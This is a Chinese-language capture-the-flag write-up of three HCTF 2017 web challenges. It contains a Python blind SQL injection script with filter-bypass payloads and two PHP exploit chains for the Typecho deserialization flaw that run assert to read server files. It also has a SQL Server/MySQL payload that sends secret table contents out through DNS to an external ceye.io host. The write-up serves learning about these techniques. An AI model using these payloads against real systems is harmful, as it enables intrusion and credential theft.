HCTF2017 部分web wp

SQL Silencer

SQL盲注，用自己渣渣的脚本fuzzing了一波，过滤了很多东西：* 空格 limit for ......
用白大佬构造的payload：写盲注脚本：

#coding=UTF-8
import requests
result = ''
url = 'http://sqls.2017.hctf.io/index/index.php'

payload = '?id=1%0d%3C%3E%0d(select%0dcase%0dwhen%0d(ascii(substring(({sql})from%0d{list}))={num})%0dthen%0d(select%0d0)%0delse%0d(select%0d1)%0dend)'

for i in xrange(0,50):
    for j in xrange(32,126):
        hh = payload.format(sql='select%0dflag%0dfrom%0dhctf.flag%0dwhere%0dflag%0dlike%0d0x256863746625',list=str(i),num=str(j))
        #print hh
        zz = requests.get(url+hh)
        #print zz.content
        if 'Alice' in zz.content:
            result += chr(j)
            print result
            break

跑出数据库hctf，题目给了表名flag
由于过滤了_不能查字段名，表名，select count（1）发现表里有2个字段
瞎猜字段名为flag，验证：selec count(flag)返回正确
模糊搜索select flag from hctf.flag where flag like hex(%flag%)

图片.png

本来以为是flag，刚开始各种尝试，发现是目录，但是返回403
于是乎开始跑另一个字段select flag from hctf.flag where flag not like hex(%flag%)

图片.png

这时候我激动了，于是乎这两个路径试来试去，然后问出题人说这不是脑洞！
........
http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/index.php
一口老血........
Typecho前台序列化漏洞，但是没有写权限，只能读了。

poc

<?php
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct()
    {
        // $this->_params['screenName'] = 'whoami';
        $this->_params['screenName'] = 'print_r(scandir('/'))';
        $this->_filter[0] = 'assert';
    }
}

class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    /** 定义ATOM 1.0类型 */
    const ATOM1 = 'ATOM 1.0';
    /** 定义RSS时间格式 */
    const DATE_RFC822 = 'r';
    /** 定义ATOM时间格式 */
    const DATE_W3CDTF = 'c';
    /** 定义行结束符 */
    const EOL = "\n";
    private $_type;
    private $_items = array();
    public $dateFormat;

    public function __construct()
    {
        $this->_type = self::RSS2;
        $item['link'] = '1';
        $item['title'] = '2';
        $item['date'] = 1507720298;
        $item['author'] = new Typecho_Request();
        $item['category'] = array(new Typecho_Request());

        $this->_items[0] = $item;
    }
}

$x = new Typecho_Feed();
$a = array(
    'host' => 'localhost',
    'user' => 'xxxxxx',
    'charset' => 'utf8',
    'port' => '3306',
    'database' => 'typecho',
    'adapter' => $x,
    'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($a)));
?>

参考文章：
https://paper.seebug.org/424/
http://p0sec.net/index.php/archives/114/
还有大白的poc：

<?php
global $functionName;
global $evilParam;
$functionName = "assert";
$evilParam = "print_r(scandir('/'))";
$b = new Typecho_Feed();

$poc = array(
    "adapter" => $b,
    "prefix" => 1,
    );

$data = serialize($poc);
$config = unserialize($data);
echo base64_encode($data).PHP_EOL;

class Typecho_Request
{
    private $_params = array(
        "screenName" => "",
        "url" => "phpinfo");
    private $_filter = array();

    public function __construct()
    {
        global $functionName;
        global $evilParam;
        $this->_params['screenName'] = $evilParam;
        $this->_filter = array($functionName);
    }

}

class Typecho_Feed
{
    /** 定义RSS 1.0类型 */
    const RSS1 = 'RSS 1.0';

    /** 定义RSS 2.0类型 */
    const RSS2 = 'RSS 2.0';

    /** 定义ATOM 1.0类型 */
    const ATOM1 = 'ATOM 1.0';

    private $_type;

    const EOL = "\n";

    private $_items = array();
    public function __construct($version="1", $type = "ATOM 1.0", $charset = 'UTF-8', $lang = 'en')
    {
        $this->_version = $version;
        $this->_type = $type;
        $this->_charset = $charset;
        $this->_lang = $lang;
        $a = new Typecho_Request();
        $b = new Typecho_Request();
        $this->_items = array(array("author"=>$a,"category"=>array("name"=>$b)));
    }

}

读到目录了：

$this->_params['screenName'] = 'print_r(scandir("/"))';
$this->_filter[0] = 'assert';

图片.png

继续读：

$functionName = "assert";
$evilParam = "print_r(scandir('/flag_is_here'))";

图片.png

$functionName = "assert";
$evilParam = "print_r(file_get_contents('/flag_is_here/flag'))";

图片.png

boring website

扫描一下，www.zip中有index.php的内容：

<?php
echo "Bob received a mission to write a login system on someone else's server, and he he only finished half of the work<br />";
echo "flag is hctf{what you get}<br /><br />";
error_reporting(E_ALL^E_NOTICE^E_WARNING);

try {
   $conn = new PDO( "sqlsrv:Server=*****;Database=not_here","oob", ""); 
}

catch( PDOException $e ) {
   die( "Error connecting to SQL Server".$e->getMessage() ); 
}

#echo "Connected to MySQL<br />";
echo "Connected to SQL Server<br />";

$id = $_GET['id'];
if(preg_match('/EXEC|xp_cmdshell|sp_configure|xp_reg(.*)|CREATE|DROP|declare|insert|into|outfile|dumpfile|sleep|wait|benchmark/i', $id)) {
    die('NoNoNo');
}
$query = "select message from not_here_too where id = $id"; //link server: On  linkname:mysql

$stmt = $conn->query( $query ); 
while ( @$row = $stmt->fetch( PDO::FETCH_ASSOC ) ){
    //TO DO: ...
    //It's time to sleep...
}

?>

因为我前面并没有做，
据说是sqlserver连接mysql的转换命令，再注入
参考文章：http://bobao.360.cn/learning/detail/3458.html
工具：http://ceye.io/records/dns
payload：
http://106.15.53.124:38324/?id=1; Select * from OpenQuery(mysql,'SELECT LOAD_FILE(CONCAT("\\\\",(select concat(id,name,password) from webwebweb.secret),".mysql.ip.port.xo2qpw.ceye.io\\abc"))');